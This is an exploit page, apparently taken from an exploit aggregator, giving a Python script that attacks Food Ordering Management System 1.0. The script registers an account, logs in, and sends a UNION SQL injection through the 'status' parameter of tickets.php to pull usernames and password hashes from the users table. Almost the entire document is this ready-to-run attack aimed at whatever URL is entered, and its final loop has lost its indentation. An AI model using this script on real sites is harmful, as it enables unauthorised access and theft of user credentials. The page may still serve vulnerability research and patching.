Exploit for Food Ordering Management System 1.0 SQL Injection

Name: Exploit for Food Ordering Management System 1.0 SQL Injection
Rating: 5 (204 reviews)
2022-09-27 | CVSS 0.5
## https://sploitus.com/exploit?id=PACKETSTORM:168517
# Exploit Title: Food Ordering Management System - SQL Injection  
# Google Dork: N/A  
# Date: 2022-9-27  
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11  
# Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip  
# Tested on: windows 11 - XAMPP  
# CVE : N/A  
# Version: 1.0  
  
#/usr/bin/python3   
  
import requests   
import os  
import sys  
import time  
import random  
from bs4 import BeautifulSoup  
  
# clean screen  
os.system("cls")  
os.system("clear")  
  
logo = '''  
##################################################################  
# #   
# SQL injection (Food Ordering Management System) #  
# #  
##################################################################  
'''  
print(logo)  
  
url = str(input("Enter website url => "))  
username = str(input("Enter Username => : "))  
name = ("test123456")  
password = ("test123456")  
phone = ("4511233199")  
number = ("1234567891000000")  
cvv = ("444")  
  
req = requests.Session()  
  
regsiter_page = (url+"/foms/routers/register-router.php")  
regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv}  
req_regsiter = req.post(regsiter_page,data=regsiter)  
print("[+] Regsiter Successfully")  
  
login = {'username':username,'password':password}  
login_page = (url+"/foms/routers/router.php")  
req_login = req.post(login_page,data=login)  
print("[+] Login Successfully")  
  
sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -")  
text = sql.text  
soup = BeautifulSoup(text,"html.parser")  
  
print("[+] SQL Injction Get Users and Password from table Users")  
for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}):  
time.sleep(0.2)  
print(link.get)